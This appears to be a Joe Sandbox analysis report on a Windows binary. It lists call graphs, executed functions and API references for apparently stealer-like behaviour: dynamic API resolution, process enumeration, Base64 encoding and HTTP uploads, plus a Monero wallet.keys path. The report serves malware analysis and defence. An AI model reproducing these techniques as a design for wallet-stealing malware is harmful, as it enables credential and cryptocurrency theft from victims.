15810 3c85c6 15809->15810 15811 3ca9b0 4 API calls 15810->15811 15812 3c85ea 15811->15812 15813 3ca8a0 lstrcpy 15812->15813 15814 3c85f6 15813->15814 15814->15795 15816 3ca740 lstrcpy 15815->15816 15817 3c86bc CreateToolhelp32Snapshot Process32First 15816->15817 15818 3c875d CloseHandle 15817->15818 15819 3c86e8 Process32Next 15817->15819 15820 3ca7a0 lstrcpy 15818->15820 15819->15818 15821 3c86fd 15819->15821 15822 3c8776 15820->15822 15821->15819 15823 3ca9b0 lstrcpy lstrlen lstrcpy lstrcat 15821->15823 15824 3ca8a0 lstrcpy 15821->15824 15822->15271 15823->15821 15824->15821 15826 3ca7a0 lstrcpy 15825->15826 15827 3c51b5 15826->15827 15828 3b1590 lstrcpy 15827->15828 15829 3c51c6 15828->15829 15844 3b5100 15829->15844 15831 3c51cf 15831->15283 15835 3c7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15832->15835 15834 3c76b9 15834->15707 15834->15708 15836 3c7765 RegQueryValueExA 15835->15836 15837 3c7780 RegCloseKey 15835->15837 15836->15837 15838 3c7793 15837->15838 15838->15834 15839->15720 15841 3c8a0c 15840->15841 15842 3c89f9 GetProcessHeap HeapFree 15840->15842 15841->15755 15842->15841 15843->15755 15845 3ca7a0 lstrcpy 15844->15845 15846 3b5119 15845->15846 15847 3b47b0 2 API calls 15846->15847 15848 3b5125 15847->15848 16004 3c8ea0 15848->16004 15850 3b5184 15851 3b5192 lstrlen 15850->15851 15852 3b51a5 15851->15852 15853 3c8ea0 4 API calls 15852->15853 15854 3b51b6 15853->15854 15855 3ca740 lstrcpy 15854->15855 15856 3b51c9 15855->15856 15857 3ca740 lstrcpy 15856->15857 15858 3b51d6 15857->15858 15859 3ca740 lstrcpy 15858->15859 15860 3b51e3 15859->15860 15861 3ca740 lstrcpy 15860->15861 15862 3b51f0 15861->15862 15863 3ca740 lstrcpy 15862->15863 15864 3b51fd InternetOpenA StrCmpCA 15863->15864 15865 3b522f 15864->15865 15866 3b58c4 InternetCloseHandle 15865->15866 15867 3c8b60 3 API calls 15865->15867 15873 3b58d9 codecvt 15866->15873 15868 3b524e 15867->15868 15869 3ca920 3 API calls 15868->15869 15870 3b5261 15869->15870 15871 3ca8a0 lstrcpy 15870->15871 15872 3b526a 15871->15872 15874 3ca9b0 4 API calls 15872->15874 15877 3ca7a0 lstrcpy 15873->15877 15875 3b52ab 15874->15875 15876 3ca920 3 API calls 15875->15876 15878 3b52b2 15876->15878 15884 3b5913 15877->15884 15879 3ca9b0 4 API calls 15878->15879 15880 3b52b9 15879->15880 15881 3ca8a0 lstrcpy 15880->15881 15882 3b52c2 15881->15882 15883 3ca9b0 4 API calls 15882->15883 15885 3b5303 15883->15885 15884->15831 15886 3ca920 3 API calls 15885->15886 15887 3b530a 15886->15887 15888 3ca8a0 lstrcpy 15887->15888 15889 3b5313 15888->15889 15890 3b5329 InternetConnectA 15889->15890 15890->15866 15891 3b5359 HttpOpenRequestA 15890->15891 15893 3b58b7 InternetCloseHandle 15891->15893 15894 3b53b7 15891->15894 15893->15866 15895 3ca9b0 4 API calls 15894->15895 15896 3b53cb 15895->15896 15897 3ca8a0 lstrcpy 15896->15897 15898 3b53d4 15897->15898 15899 3ca920 3 API calls 15898->15899 15900 3b53f2 15899->15900 15901 3ca8a0 lstrcpy 15900->15901 15902 3b53fb 15901->15902 15903 3ca9b0 4 API calls 15902->15903 15904 3b541a 15903->15904 15905 3ca8a0 lstrcpy 15904->15905 15906 3b5423 15905->15906 15907 3ca9b0 4 API calls 15906->15907 15908 3b5444 15907->15908 15909 3ca8a0 lstrcpy 15908->15909 15910 3b544d 15909->15910 15911 3ca9b0 4 API calls 15910->15911 15912 3b546e 15911->15912 16005 3c8ead CryptBinaryToStringA 16004->16005 16007 3c8ea9 16004->16007 16006 3c8ece GetProcessHeap RtlAllocateHeap 16005->16006 16005->16007 16006->16007 16008 3c8ef4 codecvt 16006->16008 16007->15850 16009 3c8f05 CryptBinaryToStringA 16008->16009 16009->16007 16013->15286 16256 3b9880 16014->16256 16016 3b98e1 16016->15293 16018 3ca740 lstrcpy 16017->16018 16191 3ca740 lstrcpy 16190->16191 16192 3c0266 16191->16192 16193 3c8de0 2 API calls 16192->16193 16194 3c027b 16193->16194 16195 3ca920 3 API calls 16194->16195 16196 3c028b 16195->16196 16197 3ca8a0 lstrcpy 16196->16197 16198 3c0294 16197->16198 16199 3ca9b0 4 API calls 16198->16199 16257 3b988e 16256->16257 16260 3b6fb0 16257->16260 16259 3b98ad codecvt 16259->16016 16263 3b6d40 16260->16263 16264 3b6d63 16263->16264 16278 3b6d59 16263->16278 16279 3b6530 16264->16279 16268 3b6dbe 16268->16278 16289 3b69b0 16268->16289 16270 3b6e2a 16271 3b6ee6 VirtualFree 16270->16271 16273 3b6ef7 16270->16273 16270->16278 16271->16273 16272 3b6f41 16276 3c89f0 2 API calls 16272->16276 16272->16278 16273->16272 16274 3b6f38 16273->16274 16275 3b6f26 FreeLibrary 16273->16275 16277 3c89f0 2 API calls 16274->16277 16275->16273 16276->16278 16277->16272 16278->16259 16281 3b6542 16279->16281 16280 3b6549 16280->16278 16283 3b6660 16280->16283 16281->16280 16299 3c8a10 GetProcessHeap RtlAllocateHeap 16281->16299 16284 3b668f VirtualAlloc 16283->16284 16286 3b6730 16284->16286 16288 3b673c 16284->16288 16287 3b6743 VirtualAlloc 16286->16287 16286->16288 16287->16288 16288->16268 16290 3b69c9 16289->16290 16294 3b69d5 16289->16294 16291 3b6a09 LoadLibraryA 16290->16291 16290->16294 16292 3b6a32 16291->16292 16291->16294 16297 3b6ae0 16292->16297 16300 3c8a10 GetProcessHeap RtlAllocateHeap 16292->16300 16294->16270 16295 3b6ba8 GetProcAddress 16295->16294 16295->16297 16296 3c89f0 2 API calls 16296->16297 16297->16294 16297->16295 16298 3b6a8b 16298->16294 16298->16296 16299->16280 16300->16298

                    Executed Functions

                    Function 003C9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 660 3c9860-3c9874 call 3c9750 663 3c987a-3c9a8e call 3c9780 GetProcAddress * 21 660->663 664 3c9a93-3c9af2 LoadLibraryA * 5 660->664 663->664 665 3c9b0d-3c9b14 664->665 666 3c9af4-3c9b08 GetProcAddress 664->666 668 3c9b46-3c9b4d 665->668 669 3c9b16-3c9b41 GetProcAddress * 2 665->669 666->665 671 3c9b4f-3c9b63 GetProcAddress 668->671 672 3c9b68-3c9b6f 668->672 669->668 671->672 673 3c9b89-3c9b90 672->673 674 3c9b71-3c9b84 GetProcAddress 672->674 675 3c9bc1-3c9bc2 673->675 676 3c9b92-3c9bbc GetProcAddress * 2 673->676 674->673 676->675
                    APIs
                    • GetProcAddress.KERNEL32(76210000,01181730), ref: 003C98A1
                    • GetProcAddress.KERNEL32(76210000,01181508), ref: 003C98BA
                    • GetProcAddress.KERNEL32(76210000,01181748), ref: 003C98D2
                    • GetProcAddress.KERNEL32(76210000,01181760), ref: 003C98EA
                    • GetProcAddress.KERNEL32(76210000,011816D0), ref: 003C9903
                    • GetProcAddress.KERNEL32(76210000,01188C70), ref: 003C991B
                    • GetProcAddress.KERNEL32(76210000,01175430), ref: 003C9933
                    • GetProcAddress.KERNEL32(76210000,011755D0), ref: 003C994C
                    • GetProcAddress.KERNEL32(76210000,01181628), ref: 003C9964
                    • GetProcAddress.KERNEL32(76210000,01181658), ref: 003C997C
                    • GetProcAddress.KERNEL32(76210000,01181640), ref: 003C9995
                    • GetProcAddress.KERNEL32(76210000,01181520), ref: 003C99AD
                    • GetProcAddress.KERNEL32(76210000,011755F0), ref: 003C99C5
                    • GetProcAddress.KERNEL32(76210000,01181550), ref: 003C99DE
                    • GetProcAddress.KERNEL32(76210000,01181778), ref: 003C99F6
                    • GetProcAddress.KERNEL32(76210000,011754F0), ref: 003C9A0E
                    • GetProcAddress.KERNEL32(76210000,01181568), ref: 003C9A27
                    • GetProcAddress.KERNEL32(76210000,01181670), ref: 003C9A3F
                    • GetProcAddress.KERNEL32(76210000,01175510), ref: 003C9A57
                    • GetProcAddress.KERNEL32(76210000,01181820), ref: 003C9A70
                    • GetProcAddress.KERNEL32(76210000,011753B0), ref: 003C9A88
                    • LoadLibraryA.KERNEL32(01181838,?,003C6A00), ref: 003C9A9A
                    • LoadLibraryA.KERNEL32(01181808,?,003C6A00), ref: 003C9AAB
                    • LoadLibraryA.KERNEL32(011817F0,?,003C6A00), ref: 003C9ABD
                    • LoadLibraryA.KERNEL32(01181850,?,003C6A00), ref: 003C9ACF
                    • LoadLibraryA.KERNEL32(01181868,?,003C6A00), ref: 003C9AE0
                    • GetProcAddress.KERNEL32(75B30000,01181880), ref: 003C9B02
                    • GetProcAddress.KERNEL32(751E0000,01181898), ref: 003C9B23
                    • GetProcAddress.KERNEL32(751E0000,011818B0), ref: 003C9B3B
                    • GetProcAddress.KERNEL32(76910000,01188EB0), ref: 003C9B5D
                    • GetProcAddress.KERNEL32(75670000,011753D0), ref: 003C9B7E
                    • GetProcAddress.KERNEL32(77310000,01188B90), ref: 003C9B9F
                    • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 003C9BB6
                    Strings
                    • NtQueryInformationProcess, xrefs: 003C9BAA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: NtQueryInformationProcess
                    • API String ID: 2238633743-2781105232
                    • Opcode ID: a8a1df9fc9d0da8d1f666f7e7fd202b69d5e23936aa3b7921b7fe9e679ed377c
                    • Instruction ID: 00f3c0dd61510ac6d8ed5fea76c9b61d48aa509f99cec28f37e5c4d9dd5a519e
                    • Opcode Fuzzy Hash: a8a1df9fc9d0da8d1f666f7e7fd202b69d5e23936aa3b7921b7fe9e679ed377c
                    • Instruction Fuzzy Hash: 9FA18DF5501241AFC308EFA9ED88E7637F9F768380704851AA60DC3224D77DA84AEB13
                    Function 003B45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 764 3b45c0-3b4695 RtlAllocateHeap 781 3b46a0-3b46a6 764->781 782 3b474f-3b47a9 VirtualProtect 781->782 783 3b46ac-3b474a 781->783 783->781
                    APIs
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003B460E
                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 003B479C
                    Strings
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B473F
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B462D
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B46CD
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B477B
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B45D2
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B466D
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4770
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B46D8
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4643
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4657
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4678
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4765
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B45DD
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B471E
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B45F3
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4638
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4683
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4713
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B474F
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4617
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B45E8
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B475A
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B46C2
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4622
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B46B7
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4662
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B45C7
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B46AC
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4734
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4729
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeapProtectVirtual
                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                    • API String ID: 1542196881-2218711628
                    • Opcode ID: 2f85e3a60251f6610dda29a90920a36c9900dae399cf1f8f816e905478098c72
                    • Instruction ID: 16ee70012a7afb5dac59a922f98f5a155917db9e8f367b9cd685d127eb3549ca
                    • Opcode Fuzzy Hash: 2f85e3a60251f6610dda29a90920a36c9900dae399cf1f8f816e905478098c72
                    • Instruction Fuzzy Hash: 9B41FF626C6618EAFE2AFBE4AC42FDD77765F42B09F507082EA0053793CBB065214536
                    Function 003B4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 801 3b4880-3b4942 call 3ca7a0 call 3b47b0 call 3ca740 * 5 InternetOpenA StrCmpCA 816 3b494b-3b494f 801->816 817 3b4944 801->817 818 3b4ecb-3b4ef3 InternetCloseHandle call 3caad0 call 3b9ac0 816->818 819 3b4955-3b4acd call 3c8b60 call 3ca920 call 3ca8a0 call 3ca800 * 2 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca920 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca920 call 3ca8a0 call 3ca800 * 2 InternetConnectA 816->819 817->816 829 3b4f32-3b4fa2 call 3c8990 * 2 call 3ca7a0 call 3ca800 * 8 818->829 830 3b4ef5-3b4f2d call 3ca820 call 3ca9b0 call 3ca8a0 call 3ca800 818->830 819->818 905 3b4ad3-3b4ad7 819->905 830->829 906 3b4ad9-3b4ae3 905->906 907 3b4ae5 905->907 908 3b4aef-3b4b22 HttpOpenRequestA 906->908 907->908 909 3b4b28-3b4e28 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca920 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca920 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca920 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca920 call 3ca8a0 call 3ca800 call 3ca740 call 3ca920 * 2 call 3ca8a0 call 3ca800 * 2 call 3caad0 lstrlen call 3caad0 * 2 lstrlen call 3caad0 HttpSendRequestA 908->909 910 3b4ebe-3b4ec5 InternetCloseHandle 908->910 1021 3b4e32-3b4e5c InternetReadFile 909->1021 910->818 1022 3b4e5e-3b4e65 1021->1022 1023 3b4e67-3b4eb9 InternetCloseHandle call 3ca800 1021->1023 1022->1023 1024 3b4e69-3b4ea7 call 3ca9b0 call 3ca8a0 call 3ca800 1022->1024 1023->910 1024->1021
                    APIs
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                      • Part of subcall function 003B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003B4839
                      • Part of subcall function 003B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003B4849
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003B4915
                    • StrCmpCA.SHLWAPI(?,0118FA48), ref: 003B493A
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003B4ABA
                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,003D0DDB,00000000,?,?,00000000,?,",00000000,?,0118F9D8), ref: 003B4DE8
                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003B4E04
                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 003B4E18
                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003B4E49
                    • InternetCloseHandle.WININET(00000000), ref: 003B4EAD
                    • InternetCloseHandle.WININET(00000000), ref: 003B4EC5
                    • HttpOpenRequestA.WININET(00000000,0118FAA8,?,0118F160,00000000,00000000,00400100,00000000), ref: 003B4B15
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                    • InternetCloseHandle.WININET(00000000), ref: 003B4ECF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                    • String ID: "$"$------$------$------
                    • API String ID: 460715078-2180234286
                    • Opcode ID: 856d785b31be2e36e76b5411654a961868609abc9e9b2e6413d68e78af28fd16
                    • Instruction ID: 7ebfaae00544dc2345e76b75334c3623c4bd0da190f15601e017a699477cb5ee
                    • Opcode Fuzzy Hash: 856d785b31be2e36e76b5411654a961868609abc9e9b2e6413d68e78af28fd16
                    • Instruction Fuzzy Hash: 6712C87291061CABDB16EB90DC92FEEB778AF14304F50419DB106AA091EF702F49CF66
                    Function 003C7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003B11B7), ref: 003C7880
